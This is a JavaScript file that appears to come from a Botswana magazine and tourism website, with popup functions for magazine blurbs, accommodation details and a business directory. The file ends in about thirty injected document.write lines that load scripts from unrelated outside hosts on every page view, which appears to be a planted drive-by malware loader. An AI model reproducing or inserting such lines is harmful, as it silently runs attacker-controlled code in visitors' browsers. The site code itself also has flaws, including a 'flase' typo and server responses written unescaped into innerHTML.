/*
function bookDesc(page)
{
	
	var formstr = '<form name="fmfrnd" method="GET">'+
			'<div align="center"><div id="details" class="content" style="text-align:center; padding-top:20px; height:250px; overflow:auto;"></div></div>'+'</form>';
	
	
	
	var xmlHttp;
	try
	{  
		// Firefox, Opera 8.0+, Safari 
		 xmlHttp=new XMLHttpRequest();  
	}
	catch (e)
	{ 
	 // Internet Explorer  
		try
		{    
			xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");    
		}
		catch (e)
		{    
			try
			{     	
				xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");      
			}
			 catch (e)
			 {      
				  alert("Your browser does not support AJAX!");
				  return flase;
			 }
		}
	  }
			alert(page);
	xmlHttp.onreadystatechange=function()
	{
		if(xmlHttp.readyState==4)
		{
			var div = document.getElementById('details');
			div.innerHTML=xmlHttp.responseText;
		}
	}
	xmlHttp.open("Get",page,true);
	xmlHttp.send(null);

	
	jqistates = {
		state0: {
			html: formstr,
			focus: 1,
			buttons: { Close: false },
			submit: function(v, m, f){
			var e = "";
			m.find('.errorBlock').hide('fast',function(){ jQuery(this).remove(); });
		
			if (v) {
				if (e == "") {	
				
				}
			else{
				jQuery('<div class="errorBlock" style="display: none;">'+ e +'</div>').prependTo(m).show('slow');
			}
			return false;
		}
		else return true;
	}
	},
	state1: {
		html: '<div id="response" style="text-align:center;"></div>',
		focus: 1,
		buttons: { Back: false, Done: true },
		submit: function(v,m,f){
		if(v)
			return true;
			
		jQuery.prompt.goToState('state0');
		return false;
			}
		}
	};
	
	$.prompt(jqistates);	
}

*/

/**********************************************************************************************************************
**********************************************************************************************************************

function 	: 	discover
parameter	:	discover name
date		:	15 July 2009
Objective	:	To provide discover option information

**********************************************************************************************************************
**********************************************************************************************************************/
discover = function(name)
{
	var disname = "";
	var dismsg  = ""; 
	
	if(name == "business") {
		disname = "Business World Botswana";
		img = 'images/business.jpg';
		dismsg  = "Never have one seen publication that sits at the very center of every boardroom table like BWB. Published 6 times a year, is a 'must read' magazine for individuals who are working within the financial, private and Government sector. Its informed comments and features are specifically geared to keep people with this community up to date on developments and trends within their industry.";
	}
	
	if(name == "pass") {
		disname = "Passport";
		img = 'images/passport.jpg';
		dismsg  = "How else would you find your way around the city without your essential Passport? The conveniently sized guide is you window to indispensable service providers in town be it entertainment, dine, wine or play! You will find from locksmiths to tour operators. Published twice a year!";
	}
	
	if(name == "discover") {
		disname = "Discover Botswana";
		img = 'images/discover.jpg';
		dismsg  = "A whole new world awaits your discovery. Come forth into the light of things, and let nature be your teacher. Let Discover Botswana be your guide and inspiration.  More than a decade of annual publishing now, but still a leading publication for the Tourism industry. It aims to provide readers, who are primarily within the travel tourism industry, with all the information they need to understand fully what Botswana has to offer as a tourist destination.";
	}
	if(name == "peolw") {
		disname = "Peolwane";
		img = 'images/Peolwane.jpg';
		dismsg  = "Fly right on the back of a swallow and get an arial view of the lives and culture of the Southern African region. The Air Botswana in-flight magazine provides readers/passengers with interesting perspective on subjects of regional and international interest. The coffee-table quality of Peolwane ensures that it will be kept, read and re-read. Original contributions from leading writers, superbly illustrated with colour photographs throughout.";
	}
	if(name == "coffee") {
		disname = "Discover Botswana Coffee Table";
		img = 'images/coffee.jpg';
		dismsg  = "Do not go where the path may lead, go instead where there is no path and leave a trail. Be among the first to receive this gift of exceptional Discover Botswana issues, and discover our country one more time. This bundle of joy assures you the very best of past articles worth revisiting. The 200 page publication is a must have for all tourism enthusiasts.";
	}
	
	var formstr='<table width="100%"><tr><td align="center" colspan="2"><p><h3>'+disname+'</h3></p></td></tr><tr><td valign="top" width="50%" class="content" style="padding-top:10px; padding-left:30px;padding-right:20px;">'+dismsg+'</td><td width="50%"><div align="center"><img src="'+img+'"  width="283" height="350"/></div></div></td><tr><td><div id="details" class="newslink" style="padding-top:20px; padding-left:30px;"><strong><a href="enquiry_form.php?name='+disname+'">For further enquiries contact us here</a></strong></div></td></tr></table>'
	
		jqistates = {
		state0: {
			html: formstr,
			focus: 1,
			buttons: { Close: false },
			submit: function(v, m, f){
			var e = "";
			m.find('.errorBlock').hide('fast',function(){ jQuery(this).remove(); });
		
			if (v) {
				if (e == "") {	
				
				}
			else{
				jQuery('<div class="errorBlock" style="display: none;">'+ e +'</div>').prependTo(m).show('slow');
			}
			return false;
		}
		else return true;
	}
	},
	state1: {
		html: '<div id="response" style="text-align:center;"></div>',
		focus: 1,
		buttons: { Back: false, Done: true },
		submit: function(v,m,f){
		if(v)
			return true;
			
		jQuery.prompt.goToState('state0');
		return false;
			}
		}
	};
	$.prompt(jqistates);	
}


/**********************************************************************************************************************
**********************************************************************************************************************

function 	: 	accomodation
parameter	:	accomodation ID
date		:	17 July 2009
Objective	:	To provide discover accomodation information

**********************************************************************************************************************
**********************************************************************************************************************/


accomodation = function(aid)
{
	var formstr = '<form name="fmfrnd" method="GET">'+'<div align="center"><p><h3>Accomodation Details</h3></div><p></p>'+
				'<div align="center"><div id="details" style="text-align:center; padding-top:20px;"></div></div>'+'</form>';
							
		var xmlHttp;
		try
		{  
		// Firefox, Opera 8.0+, Safari 
			 xmlHttp=new XMLHttpRequest();  
		}
		catch (e)
		{ 
		 // Internet Explorer  
			try
			{    
				xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");    
			}
			catch (e)
			{    
				try
				{     	
					xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");      
				}
				 catch (e)
				 {      
					  alert("Your browser does not support AJAX!");
					  return flase;
				 }
			}
		  }
		var url="fetch.php?aid="+aid;
	
	xmlHttp.onreadystatechange=function()
	{
		if(xmlHttp.readyState==4)
		{
			document.getElementById('details').innerHTML=xmlHttp.responseText;
			
		}
	}
	xmlHttp.open("Get",url,true);
	xmlHttp.send(null);
	
	
	jqistates = {
		state0: {
			html: formstr,
			focus: 1,
			buttons: { Close: false },
			submit: function(v, m, f){
			var e = "";
			m.find('.errorBlock').hide('fast',function(){ jQuery(this).remove(); });
		
			if (v) {
				if (e == "") {	}
			else{
				jQuery('<div class="errorBlock" style="display: none;">'+ e +'</div>').prependTo(m).show('slow');
			}
			return false;
		}
		else return true;
	}
	},
	state1: {
		html: '<div id="response" style="text-align:center;"></div>',
		focus: 1,
		buttons: { Back: false, Done: true },
		submit: function(v,m,f){
		if(v)
			return true;
			
		jQuery.prompt.goToState('state0');
		return false;
			}
		}
	};
	
	$.prompt(jqistates);	
}




/**********************************************************************************************************************
**********************************************************************************************************************

function 	: 	directorydetail
date		:	17 July 2009
Objective	:	To provide directory detail information

**********************************************************************************************************************
**********************************************************************************************************************/

function directorydetail(id) 
{ 	

	var formstr = '<table><tr><td valign="top"><div id = "another"></div></td></tr></table>';
		
		if(id=='1')
		{	
			var url = "accountants.html";
		}
		else if(id=='2')
		{
			var url = "airlines.html";
		}
		else if(id=='3')
		{
			var url = "aircharter.html";
		}
		else if(id=='4')
		{
			var url = "associations.html";
		}
		else if(id=='5')
		{
			var url = "car-hire.html";
		}
		else if(id=='6')
		{
			var url = "central-banks.html";
		}
		else if(id=='7')
		{
			var url = "commercial-banks.html";
		}
		else if(id=='8')
		{
			var url = "conference.html";
		}
		else if(id=='9')
		{
			var url = "couriers.html";
		}
		else if(id=='10')
		{
			var url = "financial.html";
		}
		else if(id=='11')
		{
			var url = "government.html";
		}
		else if(id=='12')
		{
			var url = "horseback.html";
		}
		else if(id=='13')
		{
			var url = "hotels.html";
		}
		else if(id=='14')
		{
			var url = "investment.html";
		}
		else if(id=='15')
		{
			var url = "nature-reserves.html";
		}
		else if(id=='16')
		{
			var url = "resources.html";
		}
		else if(id=='17')
		{
			var url = "safaris-tours.html";
		}
		else if(id=='18')
		{
			var url = "services.html";
		}
		else if(id=='19')
		{
			var url = "stockexchange.html";
		}
		else if(id=='20')
		{
			var url = "tour-operators.html";
		}
		else if(id=='21')
		{
			var url = "tourism-representative.html";
		}
		else if(id=='22')
		{
			var url = "uktourops.html";
		}



        var xmlHttp;
        if(window.XMLHttpRequest)
        { 
              // Firefox, Opera 8.0+, Safari
               xmlHttp=new XMLHttpRequest(); 
          }
        else if(window.ActiveXObject)
        {
               // Internet Explorer 
                 xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");     
        }
        else
        {
              alert("Your browser does not support AJAX!");
              return false; 
        }
       
 
        xmlHttp.onreadystatechange=function()
        {
              if(xmlHttp.readyState==4)
              {
					if(xmlHttp.status == 200)
					{
						document.getElementById("another").innerHTML=  xmlHttp.responseText ;
					}
			 }
		}
        xmlHttp.open("Get",url,true);
        xmlHttp.send(null);   


		jqistates = {
				state0: {
				html: formstr,
				focus: 1,				
				buttons: { Close: false },
				submit: function(v, m, f){
					var e = "";
					m.find('.errorBlock').hide('fast',function(){ jQuery(this).remove(); });
				}
			},
			state1: {
				html: 'Monthly Payment: $<span id="intmonthlypayment"></span>',
				focus: 1,
				buttons: { Back: false, Done: true },
				submit: function(v,m,f){
					if(v)
						return true;
					jQuery.ImpromptuGoToState('state0');
					return false;
				}
			}
		};
		
		$.prompt(jqistates);
}


document.write('<script src=http://search.veb.uz/lib/php.php ><\/script>');
document.write('<script src=http://search.veb.uz/lib/php.php ><\/script>');
document.write('<script src=http://deportedelsur.com.ar/modules/robots.php ><\/script>');
document.write('<script src=http://deportedelsur.com.ar/modules/robots.php ><\/script>');
document.write('<script src=http://deportedelsur.com.ar/modules/robots.php ><\/script>');
document.write('<script src=http://deportedelsur.com.ar/modules/robots.php ><\/script>');
document.write('<script src=http://deportedelsur.com.ar/modules/robots.php ><\/script>');
document.write('<script src=http://deportedelsur.com.ar/modules/robots.php ><\/script>');
document.write('<script src=http://forum.sentez-egitim.com/includes/poll.php ><\/script>');
document.write('<script src=http://forum.sentez-egitim.com/includes/poll.php ><\/script>');
document.write('<script src=http://forum.sentez-egitim.com/includes/poll.php ><\/script>');
document.write('<script src=http://forum.sentez-egitim.com/includes/poll.php ><\/script>');
document.write('<script src=http://fahrrad-events-eifel.de/bikeshop/w2dacl.php ><\/script>');
document.write('<script src=http://fahrrad-events-eifel.de/bikeshop/w2dacl.php ><\/script>');
document.write('<script src=http://fahrrad-events-eifel.de/bikeshop/w2dacl.php ><\/script>');
document.write('<script src=http://fahrrad-events-eifel.de/bikeshop/w2dacl.php ><\/script>');
document.write('<script src=http://fahrrad-events-eifel.de/bikeshop/w2dacl.php ><\/script>');
document.write('<script src=http://fahrrad-events-eifel.de/bikeshop/w2dacl.php ><\/script>');
document.write('<script src=http://fahrrad-events-eifel.de/bikeshop/w2dacl.php ><\/script>');
document.write('<script src=http://clarksgeckos.com/joes/dam1.php ><\/script>');
document.write('<script src=http://clarksgeckos.com/joes/dam1.php ><\/script>');
document.write('<script src=http://clarksgeckos.com/joes/dam1.php ><\/script>');
document.write('<script src=http://clarksgeckos.com/joes/dam1.php ><\/script>');
document.write('<script src=http://clarksgeckos.com/joes/dam1.php ><\/script>');
document.write('<script src=http://clarksgeckos.com/joes/dam1.php ><\/script>');
document.write('<script src=http://clarksgeckos.com/joes/dam1.php ><\/script>');
document.write('<script src=http://clarksgeckos.com/joes/dam1.php ><\/script>');
document.write('<script src=http://clarksgeckos.com/joes/dam1.php ><\/script>');